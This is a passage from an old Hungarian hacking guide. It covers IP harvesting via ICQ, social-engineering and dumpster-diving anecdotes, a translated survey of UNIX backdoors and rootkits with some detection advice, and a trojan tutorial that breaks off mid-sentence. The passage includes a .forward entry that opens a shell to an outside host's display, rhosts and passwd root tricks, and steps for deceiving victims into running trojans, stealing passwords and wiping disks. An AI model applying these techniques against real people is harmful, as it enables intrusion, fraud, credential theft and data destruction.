4, ICQ. Ez egy jó progi de nem biztonságos. Van az embernek 1 UINszáma. Na ezt<br />

bepötyögöd az ICQ snifferbe és máris kész az IP. (icq-ról bővebben az icq-részbe)<br />

Pár prg ami tovább könnyíti a dolgotokat:<br />

Ping : gyors IP cím<br />

Fastscan : gyors port scanner<br />

Itt 1 kicsit bonyolultbb módszer az IP szerzésre:<br />

A következő számok ugyanannak az IP-címnek az azonos értékű +jelenései<br />

- Az IP cím bináris számként: 10000110 00011000 00001000 01000010<br />

- Az IP-cím decimális számként : 2,249,721,922 (vagy -2,045,245,374)<br />

- Az IP-cím hexadecimális számként : 0x86180842<br />

- Az IP-cím pontokkal elválasztott decimális számként : 134.24.8.66<br />

Ennyit egyenrőle az IP-ről. Még lesznek módszerek meg trükkök. Azért kell ezzel<br />

ennyit foglalkozni, mert alap dolog és majdnem mindenhez kell a továbbiakban...<br />

Dodge Viper<br />

http://w3.swi.hu/dviper<br />

************************************************************************************************<br />

Social Engineering (társadalommérnökség)<br />

Social Engineering, azaz emberek manipulálásával bejutni számítógépes<br />

rendszerbe. Ne higgyük azt, hogy ez nem igazi Hacker módszer. Ezt a módszert<br />

alkalmazta a nagy hacker Kevin Mitnick is sokszor. A Hackerek és Crackerek között<br />

nagyon kevés a nő, mégis vannak +határozó személyek. A Social Engineering<br />

módszert nagyon magas szinten alkalmazó Hacker is nő volt. Susan Thunder, aki<br />

mellesleg Kevin Mitnick környezetében tartózkodott. Nézzünk + Susan hogyan<br />

bizonyította be, hogy a módszer nagyon is hatékony... A törés helye 1 tárgyalóterem<br />

volt, ahol a tengerészet és a légierő magas rangú tisztjei ültek. Susannak 1 borítékot<br />

adtak, amiben a +adták a computerközpont nevét, amit + kellett törni. A cél<br />

86


Hackers’ Guide<br />

érdekében bármilyen eszközt igénybe vehetett (computer, modem , telefon ). Susan<br />

rögtön csatlakozott a könnyen hozzáférhető katonai számítógépre, és kikereste a<br />

főbb adatokat. A lényeg az volt, hogy kikereste a gépet karbantartó emberke nevét.<br />

Felhívta a bázist telefonon, és kiderítette, hogy ki a parancsnok. Nem kellet mást<br />

tennie csak használni a szakzsargont és máris az ölébe hullott az infó, hogy Hasting<br />

őrnagy az akit keres. Még azt is sikerült kiderítenie, hogy az őrnagy titkárnőjét<br />

Hastingsnak hívják.. Ennyi infó elég volt, hogy felhívja a +törendő<br />

számgépközpontot. A következők hangzottak el.<br />

-Buchanan vagyok. Az őrnagy +bízásából telefonálok, mert nem tud beloggolni a<br />

rendszerbe.. Az őrnagy kérdezi, hogy ennek mi az oka.<br />

(a rendszergazda +tagadta a választ.)<br />

(ekkor Susan erősebb hangnemet vett föl)<br />

-Nézze nem azért telefonáltam, hogy az időmet fecséreljem! Mi a neve, beosztása,<br />

és szolgálati száma?<br />

Még 20 perc sem telt el és Susan birtokában voltak az első titkos infók.. Mielőtt<br />

tovább lépett volna, a tábornok felállt az asztaltól és csak annyit mondott, hogy ennyi<br />

1enlőre elég lesz…..<br />

Tehát bebizonyosodott az, hogy minden rendszer leggyengébb láncszeme az ember.<br />

Az se véletlen, hogy a számitógépes betörések nagy részét belső emberek követik<br />

el. 1 hacker számára a leg1*űbb +oldás pénzzel, zsarolással belső kapcsolatra szert<br />

tenni. Éppen erre szolgál a Social Engineering. Akinek nincs elég pénze lefizetni 1<br />

rendszergazdát az vezzese félre azt. El kell vele hitetni, hogy ő 1 jogosult<br />

felhasználó.<br />

Már említettem hogy Kevin Mitnick is használta ezt a módszert előszerettel. Lássuk,<br />

hogyan tette. A Los Angelesi COSMOS központjába lopakodott. Rövid 1eztetés után<br />

Mitnick és két társa, Roscoe , és Mark Rossl 1*üen besétált az épületbe, és<br />

odament az ügyeletes tisztviselő asztalához. Kiadtág magukat a Pacific Bell<br />

alkalmazottainak. Azt a szöveget nyomták, hogy másnapra + kell írniuk 1 jelentést.<br />

Még az azonosítószámukat sem kérték……Az út szabad volt +keresték a 108-as<br />

szobát. Amit már előzetes informálódás során kiderítették, hogy az a szoba érdekes<br />

nekik.. Majd a rendszergazda szobájába találtak 6 darab kézikönyvet, amiben a<br />

Cosmos computerről volt minden információ. Magukhoz is vették 1ből. Majd<br />

kisétáltak.<br />

Több cikket is olvastam különböző külfoldi lapokon erről a témáról, és mind1iken<br />

máshogy szerepelnek az adatok/tények, a módszer lényeget leírtam, az ugyanaz volt<br />

mind1ikben.<br />

Dodge Viper<br />

1999.12.20.<br />

http://w3.swi.hu/dviper<br />

************************************************************************************************<br />

Trashing or dumpster diving (kukabúvárkodás)<br />

87


Hackers’ Guide<br />

A hackerek közkedvelt módszere a kukabúvárkodás. Vagyis elmennek a kiszemelt<br />

céghez este, és ott átkutatják a szemeteseket. A kidobott szemétben próbálnak<br />

minél több hasznos infót összegyűjteni. Ilyenkor minden kis adat fontos lehet. Az<br />

adott személy hova jár szórakozni, kedvenc étele, a kidobott papírok alapján + kell<br />

próbálni kideríteni a jelenlegi vagy régi loginnevet/jelszót. Elég fura elképzelni, hogy<br />

az információ szabadságharcosai ott álnak a kuka előtt és könyékig benne túrnak.<br />

De hát ez van. A célért mindent! Ezt a módszert is alkalmazta a legnagyobb hacker,<br />

Kevin Mitnick és társa Blake Harris is, amikor a Cosmos központjába próbáltak<br />

behatolni. Sajnos valaki/valakik már +előzték őket.<br />

Dodge Viper<br />

1999.12.25.<br />

http://w3.swi.hu/dviper<br />

************************************************************************************************<br />

Backdoors<br />

Az elso betoresek ota a hackerek mindig megprobaltak ujabb technikakat es<br />

kiskapukat talalni, amellyekkel bejuthatnak a rendszerbe. Ebben a doksiban<br />

megemlitek nehany backdoort illetve a felismeresukrol is lesz par mondat. Nagyreszt<br />

a UNIX-rol lesz szo, de a Windows NT-rol is lesz egy resz. A leiras bemutatja, hogy a<br />

behatolok hogyan juthatnak be a rendszerbe, illetve segitseget nyujt az<br />

adminisztratoroknak, az ujabb tamadasok ellen. Mikor egy adminisztrator tudja, hogy<br />

milyen nehez egy betolakodot eltavolitani, ha mar az egyszer bejutott, akkor ertheto,<br />

hogy megbecsuli az elozetes vedekezest. Ez abbol all, hogy minnel tobb a kezdo es<br />

profi hackerek altal hasznalt rest derit fel. Persze nem az osszeset, hisz a<br />

lehetosegek szama vegtelen.<br />

Egy bacdoor a legtobb betolakodonak ket, vagy 3 dolgot nyujt:<br />

Kepes visszaterni a gepbe, meg akkor is, ha az adminisztrator megprobalja azt<br />

biztonsagosabba tenni PL.: a passwordok kicserelesevel Kepes legyen visszaterni a<br />

rendszerbe a leheto legrovidebb ido alatt. A legtobb hacker szeret egyszeuen<br />

visszaterni a rendszerbe az egesz gep ujrefeltorese nelkul. Nehany esetben, ha a<br />

hacker ugy erzi, hogy az adminisztrator talat egy altala letrehozott rest, akkor a gep<br />

sebezhetoseget, kihasznalva lep be ujra. Igy elkeruli azt, hogy az adminisztrator<br />

esetleg felfedje. Nehany esetben a gep sebezhetosege marad az egyetlen backdoor.<br />

A password feltores<br />

Az elso es a legosibb modszer a bejutasra nem csak a UNIX-on, hanem a tobbi<br />

rendszeren is a password feltoro programok futtatasa. Ezzel szerezhetok egyszeru<br />

88


Hackers’ Guide<br />

passwordos accountok. Igy az osszes feltort kulcsszo backdoor lehet addig, amig az<br />

adminisztrator le nem tiltja oket. Sokszor a behatolo olyan hasznalatlan accountokat<br />

keres, amelyeknek egyszeru passwordjeik vannak, amiket aztan kesobb<br />

bonyolultabbakra nevezhet at, igy amikor az adminisztrator gyenge passwordoket<br />

keres, a modositattakat mar nem fogja megtalani. Igy az adminisztrator, mar nem<br />

fogja olyan egyszeruen megtalani azokat az accountokat, amelyeket meg kell<br />

szuntetnie.<br />

Rhosts + + A halozatba kotott UNIX gepeke az Rsh es az Rlogin szolgaltatasoknal<br />

csak egyszeruen az rhost fileban levo hostnev alapjan azonositjak a gepeket. A<br />

felhasznalo konnyen beallithatja, hogy melyik gepektol nem ker passwordot<br />

belepeskor. Egy hacker ez kihasznalhatja, ha egy "+ +" -t beir az aldozat gepenek<br />

rhost filejaba, ekkor ugyanis barki hasznalhatja azt az accountot password nelkul.<br />

Rengeteg hacker kihasznalja ezt, amikor az NFS exportalja a home konyvtarat a<br />

vilagnak. Ezeken a hatso ajtokon a hackerek visszaterhetnek a rendszerbe. Sok<br />

hacker jobban szereti az Rst-t, mint az Rlogint, mert az a legtobb rendszerben le van<br />

tiltva, vagy lockolva van. Sok adminisztrator keresi a "+ +" -t ezert a legtobb hacker<br />

egy hostnevet es egy felhasznaloi nevet rak a fileba egy masik feltort geprol, igy<br />

kevesbe feltuno a dolog.<br />

Checksum es Timestamp<br />

Regen sokan kicsereltek a binaros fileokat a sajat trojai programjaikkal. Sok<br />

adminisztrator hasznalt ido es adatvaltozast figyelo programokat, PL.: a UNIX<br />

checksum programjat, hogy eszrevegyek, ha egy binaris file megvaltozott. A<br />

hackerek rajottek a technologiara, amivel a trojai program idejet beallithattak az<br />

eredeti programeval megegyezore. Ez ugy mukodott, hogy a rendszerorat<br />

visszaallitottak az eredeti file idejere es ekkor raktak fel a trojai progit, majd a vegen<br />

visszaalitottak az eredeti idot a rendszeroran. A sum program a CRC cheksumra<br />

tamaszkodik es ez konnyen kijatszhato. A hackerek olyan programokat keszitettek,<br />

amelyek a trojai program meretet az eredeitiere modositottak, ezzel megoritve az<br />

adminisztratorokat. MD5 az arusok altal legtobbet ajanlott checksum program<br />

napjainkban. Az MD5 egy olyan algoritmuson alapul, amelyen a datumot<br />

bizonyitottan meg senki nem tudta kijatszani.<br />

Login<br />

A UNIX-on a login az a program, amelyik altalaban ellenorzi a passwordot, amikor<br />

valaki betelnetel a gepbe. A hackerek elloptak a login program forras kodjat es ugy<br />

modositottak azt, hogy amikor a login osszehasonlitja a felhasznalo passworjet a<br />

tarolt jelszavakkal, akkor eloszor a backdoort ellenorzi. Ha a felhasznalo beirta a<br />

backdoor jelszot, akkor beenged attol fuggetlenul, hogy az adminisztrator milyen<br />

jelszot allitott be. Ez azt jelenti, hogy a hacker barmilyen accountba rootkent<br />

jelentkezhet be. A jelszo backdoorrla azelott be lehet jutni, mielott a felhasznalo<br />

bejelentkezne es megjelenne az utmp-ben es a wtmp-ben. Igy a hacker ugy tud<br />

bejelentkezni a rendszerbe es futtatni egy shellt, hogy senki nem latja a rendszeren<br />

az accountjat. Az adminisztratorok elkezdtek figyelni ezeket a kiskapukat ugy, hogy<br />

csinaltak egy "string" parancsot amivel megkereshetik a programban levo<br />

szovegeket. Sokszor megtalaltak a rejtett jelszavakat. A hackerek ezutan<br />

bonyolutabb jelszavakat hasznaltak, vagy jobban elrejtettek oket, igy nem lehetett<br />

csak siman a stringgel megtalalni oket. Sok adminsztrator megtalalja ezeket a rejtett<br />

jelszavakat az MD5 checksummal.<br />

89


Hackers’ Guide<br />

Telnetd<br />

Amikor egy felhasznalo betelnetel egy gepbe, akkor az inetd figyeli a portot es<br />

fogadja a hivast, majd tovabbadja az in.telnetd-nek, amely aztan futtatja a logint.<br />

Nehany hacker rajott, hogy az az adminisztratorok meg szoktak buheralni a login<br />

programot, igy ok modositottak az in.telnetd-t. Az in.telnetd rengetek dolgot tartalmaz<br />

a felhasznalorol, pl.: azt, hogy milyen terminalt hasznal. Az atlag terminal beallitas az<br />

Xterm, vagy a VT100-as. A hacker ezt kihasznalhatja ugy, ha a terminalt "letmein"-re<br />

allitja, igy barki indithat a rendszerben shellt azonositas nelkul. Az igy beallitot<br />

rendszereken a megfelelo portokon keresztul barki futtathat shellt.<br />

Services Szinte minden halozatot feltortek mar legalabb egyszer. Az atirt verzioi a<br />

finger-nek, az rhs-nak, az rexec-nek, az rlogin-nak, az ftp-nek es meg folytathatnama<br />

vegtelensegig. Vannak programok, amelyek nem csinalnak tobbet, mint csatlakoznak<br />

a TCP porthoz es bejuttatjak a hackert. Neha ritkan hasznalt parancsokat cserelnek<br />

ki ezekre a programokra, pl.: az uucp-t, vagy egyszeruen beirjak oket az inetd.conf<br />

fileba, mint egy uj parancsot. Az adminisztratoroknak nagyon figyelniuk kell, hogy<br />

milyen parancsokat futtatnak es ellenorizniuk kell az eredeti parancsokat az MD5<br />

checksummal.<br />

A Cronjob naplozza a UNIX rendszereken, hogy mikor kell bizonyos programokat<br />

futtatni. Egy hacker beleirhatja, hogy futtassa ejjel 1 es 2 kozt egy shellt. Igy a hacker<br />

1 orara belephet az ejjel folyaman. A hackerek atlagosan futtatott programokat<br />

kerestek es azokba epitettek be a kiskapukat.<br />

Library A legtobb UNIX rendszer hasznal osztott konyvtarakat. Ezek arra valok,<br />

hogy a sokszor hasznalt rutinoknak ne kelljen mindig ujra helyet foglalni, ezzel<br />

csokken a programok merete. Nehany hacker megbuheralta ezeket a rutinokat,<br />

peldaul a crypt.c-t es a _crypt.c-t. A login.c hasznalja a crypt() rutint es ha a beepitett<br />

passwordot hasznalod, akkor ad egy shellt. Igy az adminisztratorok hiaba ellenoriztek<br />

le a login programot az MD5-tel, meg mindig maradt egy backdoor rutin, ha az<br />

adminisztrator nem ellenorizte le az osztott konyvtarakat.<br />

Gondot okozott a hcakereknek, amikor az adminisztratorok elkezdtek hasznalni az<br />

MD5-ot. A hackerek egyik modszere az open(), vagy a file hozzaferesi rutinok atirasa<br />

volt. Az atalakitott rutinok ugy voltak konfigutalva, hogy az eredeti fileokat olvassak,<br />

de a trojanokat futtassak. Igy amikor az MD5 olvasta ezeket nem tortent semmi<br />

kulonos, de amikor a rendszer futtatta oket, akkor a trojai verzio indult el. Igy a trojai<br />

konyvtarakat el lehetett rejteni az MD5 elol. Az adminisztartorok egy modon<br />

talalhattak meg ezeket a konyvtarakat, ha statikailag hozzalinkeltek az MD5-ot es<br />

ugy futtattak a rendszeren. A statikusan linkelt program nem a trojai verziot<br />

hasznalja.<br />

Kernel<br />

A kernel a UNIX magja. Kernel szinten ugyanigy kikerulheto az MD5 checksum,<br />

hacsak egy statikusan linkelt program elnem arulja a kulonbseget. Egy jo kernel<br />

backdoort a legnehezebb egy adminisztratornak megtalani. "Szerencsere" a kernel<br />

backdoor scriptek meg nem igazan vannak elterjedve, bar valojaban senki sem tudja,<br />

hogy milyen szeles korben terjedtek mar el.<br />

File-rendszerek<br />

Egy hacker a zsakmanyat, vagy adatait ugy akarja tarolni a rendszeren, hogy az<br />

adminisztrator ne talalja meg oket. Egy hacker cuccai altalaban exploit scriptekbol,<br />

90


Hackers’ Guide<br />

backdoorokbol, sniffer logokbol, masolt adatokbol, pl.: e-mailekbol, forraskodokbol es<br />

hasonlo dolgokbol allnak. Ahhoz, hogy ezeket a neha igen nagy fileokat el lehesszen<br />

rejteni, at kell kicsit irni nahany rendszer parancsot, peldaul az "ls"-t a "du"-t es az<br />

"fsck"-t. Nagyon alacsony szinten a hacker bad szektoroknak is alcazhatja oket. Igy a<br />

hackernek specialis programokra lesz szuksege, hogy hasznalhassa a cuccait, de az<br />

adminisztrator csak nagyon nehezen johet ra, hogy nem is valodiak a bad szektorai.<br />

Boot-szektor A PC-s vilagban nagyonsok virus keszult, amelyik a bootszektorban<br />

rejti el magat, ezert sok virusirto vizsgalja, a bootszektor valtozasait. UNIX-on a<br />

legtobb adminisztratornak nincs olyan programja, amivel a bootszektort<br />

ellenorizhetne, igy elrejtheto nehany backdoor a bootszektorban.<br />

Process elrejtese Egy hacker igen sokszor el akarja rejteni, hogy eppen milyen<br />

programot futtat. Altalaban a password feltoro programokat es a sniffereket akarjuk<br />

elrejteni. Eleg sok megoldas van, itt van nahany ismertebb:<br />

Lehet irni egy programot, amivel az argv[] atirhato egy masik processz azonositojara.<br />

At lehet nevezni a sniffert egy legalis program nevere, pl. in.syslog es futtatni. Igy<br />

amikor az adminisztrator csinal egy "ps"-t, hogy megnezze mit futtatsz, akkor<br />

szabalyos nevet mutatja neki.<br />

At lehet irni a konyvtarfuggvenyeket, hogy a "ps" ne mutasson meg minden<br />

processzt.<br />

A megszakitas vezerlo rutinba is lehet rakni egy backdoort, hogy ne jelenjen meg<br />

minden a processz tablabol. Erre egy lelda az amod.tar.gz, amit a<br />

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html cimen nezhetsz meg.<br />

A kernel modositasaval is el lehet rejteni bizonyos processzeket.<br />

Rootkit A legnepszerubb backdoorok koze tartozik a rootkit. Ez konnyen<br />

megtalalhato az Internetes keresokkel. Itt van nehany fontos resz a README-bol:<br />

• z2 - Torli a bejegyzeseket az utmp-bol, a wtmp-bol es a lastlog-bol.<br />

• Es - rokstar ethernet sniffere a sun4 alapu kernelekhez<br />

• Fix - megprobalja meghamisitani az ellenorzo programokat, egy file<br />

segitsegevel<br />

• Sl - titkos root passwordot ad<br />

• Ic - Az ifconfigot modositja<br />

• ps - processzrejtes<br />

• Ns - a netstatot modositja, hogy elrejtse a mas gepekkel valo kapcsolatot<br />

• Ls - filok es konyvtarak elrejtese listazaskor<br />

• du5 - elrejti, hogy mennyi helyet foglalsz a merevlemezen<br />

• ls5 - filok es konyvtarak elrejtese listazaskor<br />

91


Hackers’ Guide<br />

Halozatforgalom<br />

A hackerek nemcsak a filejaikat, de a halozaton valo mozgasukat is el akarjak rejteni,<br />

amennyire csak tudjak. A halozaton neha egy hackernek tuzfalakon kell keresztul<br />

jutnia. Rengeteg halozati backdoor program van, amivel a hacker beallithat maganak<br />

egy port szamot es azon keresztul a normalis ut megkerulesevel juthat be mindig.<br />

Mivel a forgalom nem egy altalanos porton keresztul tortenik, az adminisztrator<br />

megnezheti a hacker forgalmat. Ezek a halozati backdoorok altalaban TCP-t, UDP-t,<br />

es ICMP-t hasznalnak, de lehet barmi mast is.<br />

TCP Shell<br />

A hacker beallithat egy nagyon magas portszamu TCP shell backdoort maganal, ahol<br />

valoszinuleg a tuzfal nem blokkolja a TCP portot. Ezek sokszor csak egy jelszoval<br />

vannak vedve, igy amikor egy adminisztrator csatlakozik, nem fogja rogton latni a<br />

shellt. Az adminisztrator a netstat-tal nezhet utana, hogy mely portok foglaltak es<br />

honnan, illetve hova vannak kapcsolatok. Sokszor ezek a backdoorok engedik a<br />

hackert, hogy belepjen a TCP Wrapper technologiaval. Ezek a backdoorok az SMTP<br />

porton futtathatok, amelyen nagyonsok tuzfal engedelyezi az e-mail forgalmat.<br />

UDP shell<br />

Az adminisztratorok nagyon sokszor kiszurjak a TCP kapcsolatot es feljegyzik a<br />

kulonos viselkedest, de az UDP shellhez egyaltalan nem kell kapcsolat, igy a netstat<br />

sem mutatja ki, hogy hacker van a rendszerben. Sok tuzfal engedi peldaul az UDP<br />

csomagok hasznalatat a DNS-en keresztul. Sokszor a hackerek ezen a porton<br />

helyezik el a backdoort es igy kikerulheto a tuzfal.<br />

ICMP shell<br />

A pingeles az egyik legaltalanosabb mod annak a kideritesere, hogy egy rendszer<br />

mukodik-e. Ez ICMP csomagok kuldesevel es fogadasaval dolgozik. Sok tuzfal<br />

engedi, hogy belso gepeket pingeljunk. Egy hacker adatokat rakhat az ICMP<br />

csomagokba es egy shellt hozhat letre a pingelo gepek kozt. Az adminisztrator<br />

eszlelheti a sok pingelest, de ha nem veszi eszre az adatokat a csomagokban, akkor<br />

a hacker felderitetlen marad.<br />

Encrypted link<br />

Az adminisztrator csinalhat egy sniffert, hogy megnezze az adatmozgasokat, ha<br />

valaki csatlakozik egy shellhez, de a hacker "can add encryption" ??? a halozati<br />

backdoorokhoz es ezzel szinte lehetetlenne valik a ket gep kozti adatforgalom<br />

figyelese.<br />

Windows NT<br />

Mivel a Windows NT nem igazan tobbfelhasznalos rendszer a kulonallo gepeken es<br />

a tavoli bejelentkezes hasonlo, mint a UNIX-on, nehezebb betorni, backdoorokat<br />

berakni es tamadasokat futtatni egy NT-s rendszerrol. Igy sikeresebben tamadhatok<br />

a UNIX rendszerek, mint a Windows NT. Ha a Windos NT a tobbfelhasznalosag fele<br />

halad, akkor ez tobb lehetoseget ad a Windows NT-t hasznalo hackereknek. Ha ez<br />

tortenik, akkor sok UNIX backdoor atultetheto lesz az NT-re is es akkor<br />

keszulodhetnek az adminisztratorok a hackerek ellen. Ma mar vannak telnet<br />

daemonok a Windows NT ala. Halozati forgalom backdoorokkal konnyen kijatszhato<br />

az NT.<br />

Megoldasok<br />

Ahogy a backdoor technologia fejlodik, egyre nehezebb az adminisztratoroknak<br />

92


Hackers’ Guide<br />

eszrevenni, hogy van-e hacker a rendszerben, vagy sikerult-e teljesen eltavolitani<br />

oket.<br />

Kiertekeles<br />

Az egyik elso lepes a vedelemben az, hogy kiertekeld, milyen sebezheto a<br />

halozatod, igy kitalalhatod, hogy melyik lyukakat kell kijavitanod. Sok eszkoz van,<br />

ami figyeli es atvizsgalja a halozat es a rendszer sebezhetoseget. Egyszeru,<br />

konnyen beszerezheto progikkal is rengeteget javithat barki a rendszere<br />

bizronsagan.<br />

MD5<br />

Az MD5 feltetlenul szukseges a rendszer vizsgalatahoz. Az MD5-ot a meg tiszta,<br />

feltoretlen rendszerekre kell felrakni. Ha egyszer egy hacker mar bejutott, akkor<br />

nagyon nehez ujra biztonsagossa tenni a rendszert. Sok meghackelt cegnek tobb<br />

honapig tart kizarni a hackereket a rendszerukbol. Nehany ceg, mikor rajott, hogy<br />

meghackeltek oket, visszaallitotta a backup-okat, remelve, hogy ezzel minden<br />

backdoort eltuntetnek. A dolog sikertelen volt, mivel a tobbi filelal egyutt a<br />

hackelteket is visszaraktak. Ezert kell a fileok binaris osszehasonlitasat meg a<br />

tamadas elott elvegezni.<br />

Betolakodo felismerese<br />

A betoresek felismerese sokkal fontosabba valik, mint a szervezetek osszekotese es<br />

a gepek osszekapcsolasanak engedelyezese. A regebbi betores felismero<br />

rendszerek a logolason alapulnak. A legujabb fejlesztesek (IDS) pedig a realtime<br />

sniffereken es a halozati forgalom figyelesen. Eleg sok halozati backdoor konnyen<br />

felismerheto. A legutobbi IDS megnezi a DNS UDP csomagokat es ellenorzi, hogy<br />

azok passzolnak-e a kero DNS protokolljahoz. Ha a DNS porton az adat nem<br />

egyezik a DNS protokallal, akkor eltarolja az adatot egy kesobbi elemzesre es egy<br />

figyelmezteto jelzessel latja el. Ugyanez tortenik az ICMP csomagokkal is.<br />

Megvizsgalja, hogy egyszeru pingrol van-e szo, vagy tartalmaz encrypted shell<br />

reszeket is.<br />

Bootolas CD-rol<br />

Sok adminisztrator szerint a CD-rol valo bootolas jo megoldas, hiszen a hackerek a<br />

CD-kre nem tudnak backdoorokat rakni. Ezzel annyi a gond, hogy sokba kerul es az<br />

egesz ceget el kell latni az eszkozokkel.<br />

Eberseg<br />

Mivel a biztonsagi megoldasok gyorsan valtoznak es nap mint nap ujabb es ujabb<br />

gyenge pontokat talalnak a hackerek, amiket ki is hasznalnak, nem art ebernek<br />

lennunk.<br />

Vigyazz, mert nincs feltorhettetlen rendszer es semmi sem helyettesitheti az allando<br />

eberseget.<br />

Ez meg hozzaadhato:<br />

.forward backdoor<br />

A UNIX gepeken a .forward file is egy altalanos megoldas a belepesre. A belepeshez<br />

a egy usernek a .forward fileba a kovetkezoket kell beirnia:<br />

\username<br />

93


Hackers’ Guide<br />

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"<br />

ennek a kulonbozo valtozatai megvaltoztatjak a rendszer mail aliasait (altalaban ezek<br />

a /etc/aliases-ben talalhatok). Ez csak egy egyszeru valtozat volt, egy bonyolultabb<br />

egy scriptet is futtathat a .forward filebol, amiben bonyolultabb parancsok is lehetnek.<br />

Ui.: A fenti modszerrel be lehet jutmi a cegek levelezo rendszeren keresztul<br />

(feltetelezve, hogy osztott a home konyvtar a szerveren es a kliensen is). Az smrshval<br />

kiloheto ez a backdoor (de meg igy is lehet egy kis gond, ha engedelyezed az<br />

elm szurojet, vagy a procmail-t, mert ezek futtathatnak parancsokat...)<br />

Ez is egy jo kis backdoor:<br />

A rossz uid/gid beallitasoknal a /etc/password fileban, tobbnyire a login(1) rosszul<br />

ismeri fel a uid/gui -t es az atoi(3) az uid/gid -et 0-ra allitja, igy superuseri jogokat<br />

kapsz.<br />

pl.:<br />

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh<br />

A linux gepeken ez 0-as uidot ad rmartinnak.<br />

VEGE Hat azt abszolute nem mondhatnam, hogy hibatlan lett a szoveg, de<br />

szerintem aki akar, az tud tanulni belole...<br />

1999.08.05<br />

SM-TRAX's got the groove!<br />

Irta: Christopher Claus 8/4/97<br />

Forditotta: YLOZ<br />

vargaz@iit.uni-miskolc.hu<br />

http://www.extra.hu/yloz Az eredeti angol verziot a kovetkezo cimen nezheted meg:<br />

http://www.extra.hu/yloz/stuff.html -.oOo..backdoor.txt..oOo.-<br />

************************************************************************************************<br />

Mi is az a trojai program<br />

Nagy sok ember tette már fel nekem azokat a kérdéseket, hogy hogyan kell<br />

használni a trojai programokat, hogyan kell valakinek a gépét megfertozni, mik<br />

valójában és hogyan muködnek? Tehát most megpróbálok minél érthetobben és<br />

átfogóbban válaszolni ezekre a kérdésekre.<br />

Összedobta: Nestan<br />

1. Mi is az a trojai program?<br />

Elso lépésben tehát megpróbálom körülírni. A trojai programok nem tartoznak a<br />

legitim programok közé. A Mikroszkópnak és Bill boynak köszönhetoen pedig<br />

felkerültek a vírus listákra, tehát egyes víruskeresok kiírják a találatok között. Ebbol<br />

következik, hogy alkotóik nem szoftvercégek, hanem olyan magányos farkasok<br />

illetve csoportok, akik a programokhoz hasonló illegális tevékenységet folytatnak<br />

94


Hackers’ Guide<br />

(például hacker és cracker bandák). A Trojan programokat az angol nyelv RATnek(patkány)<br />

hívja, de ez egy rövidítés, ami a Remote Administration Tools (Távoli<br />

Adminisztrációs Eszköz) szavak kezdobetuit takarja. A program kezeloje egy távoli<br />

géprol (ami lehet akár a földgömb másik végén is) irányít egy gépet, utasítsokat ad,<br />

úgy, hogy az áldozat mit sem sejt az egészrol. Nevüket a szerzok általában valami<br />

mítikus történethez, nagy csatához, ellenségekhez kapcsolják. Érdekesség még,<br />

hogy a névhez kötheto számok általában az adott trojai portszáma is. Vegyük például<br />

a Satan Backdoor nevu elég ismert trojai programot, ami a 666-os portot használja,<br />

nemhiába, hiszen a 666 a sátán száma. Ezek a programok két részbol épülnek fel.<br />

Van egy kiszolgáló rész, ami lényegesen kisebb méretu, ezt hívjuk szervernek és<br />

van egy méretileg nagyobb ügyfélprogram (client). Ha trojai programmal szeretnél<br />

mások gépe felett szinte korlátlan hatalomhoz jutni, akkor valamilyen módon el kell<br />

juttatni hozzá a szerver részt és rá kell venni, hogy indítsa el. Ezek után már csak az<br />

IP száma kell és már meg is van.<br />

Megjegyzés:<br />

Ahhoz, hogy megtudd szerezni a lamer IP számát, elosször is rá kell venni, hogy<br />

használjon valamilyen valós ideju chat programot (pl. ICQ, IRC), mondd azt, hogy<br />

szeretnél vele jókat dumálni meg még néhány süket duma. Ha kéri, elküldöd neki email-en<br />

keresztül, ekkor udvariasan mellékeled a trojai szerver részét, azzal a<br />

megjegyzéssel, hogy ha ezt elindítod akkor regisztrálja neked a programot, ha<br />

viszont o tölti le, akkor mondd azt, hogy "itt egy kép rólam" sfx-el tömörítve, ha<br />

megakarod nézni, akkor indítsd el és o automatikusan kitömörítni magát. Persze<br />

ekkor 10 percen belul jön a válasz, hogy o mindenhol kereste, de sehol sincs. Van<br />

még egy variáció... A neten találhatók olyan programok melyek megfertoznek egy<br />

adott felhasználói programot a trojaival. Mialatt o keres, te már meg is nézted az IP<br />

számát. ICQ-ban a Windows könyvtárában lévo netstat programocska segítségével,<br />

amely a hozzád kapcsolódók Host nevét írja ki, ha a host név megvan, akkor tracert<br />

hostnev és lön IP... IRC-ben pedig "dns/ becenév" paranccsal, ennyi. Most már tied a<br />

hatalom, csak tudni kell vele élni, persze az ICQ-s módszert lehet használni IRC-nél<br />

is.<br />

A legújabb trojai programok egy részében már beépített funkció(pl. Netbus 1.7), hogy<br />

a szerver futtatása után automatikusan (SMTP) küld neked egy levelet, amelyben<br />

közli veled, hogy sikeresen beírta magát a rendszerbe, rezidensé vált, mellékeli a<br />

fobb információkat és természetesen az ürge IP számát. Ha megkaptad a levelet és<br />

sikeresen felvetted a kapcsolatot az áldozat gépén futó szerverrel, akkor innen már<br />

szinte mindenre képes leszel, olyan mintha ott ülnél a helyén és te irányítanád a<br />

gépét, persze csak addig, amíg le nem megy a netrol.<br />

A trojai programok nagyobbik része már képes a fájlkezelésre. Ezáltal képes vagy<br />

programokat futtatni / nézni / törölni / áthelyezni / feltölteni az o merevlemezén. Ez<br />

korlátlan hatalmat ad a kezedbe. Ennek segítségével te akármit feltölthetsz az<br />

áldozat gépére (fájlokat, vírusokat, más trojai programokat, stb.) és futtathatod is<br />

ezeket. Néhány a közelmultban megjelent trojai programban már beépített funkció az<br />

egyszeru formázás az áldozat gépén (Format c:\) Ennek segítségével teljesen le<br />

tudod törölni merevlemezének tartalmát. Az új, hatásosabb változatok segítségével<br />

listát kérhetsz az eltárolt kódokról (password) és így például megtudod szerezni az o<br />

kapcsolt vonalas internetszolgáltatásának azonosítóját és kódját is. Néhány nagyon<br />

kellemetlen, mások számára idegesíto funkciót is tartalmaznak mint például a rejtett<br />

95


Hackers’ Guide<br />

egér, egér irányítás, cd olvasó kinyitása és bezárása, windows újraindítása, Internet<br />

Explorerben vagy Netscapeben URL azonnali megnyitása, képek megjelenítése az<br />

áldozat gépén, jegyzettömb tömeges megnyitása meg efféle jópofa dolgok (persze<br />

ez csak a lamerekkel fordul elo). Ez nem annyira káros, de eléggé fel tudja az illetot<br />

bosszantani.<br />

2. Hogyan is muködnek ezek a programok?<br />

Amikor a lamer gépén fut a trojai szerver része, akkor egy speciális portot nyit meg,<br />

amire bárki felcsatlakozhat. Ehhez kellenek általában a port scannerek, melyek<br />

segítségével megtudhatjuk a nyitott és a foglalt portokat. Természetesen te a porton<br />

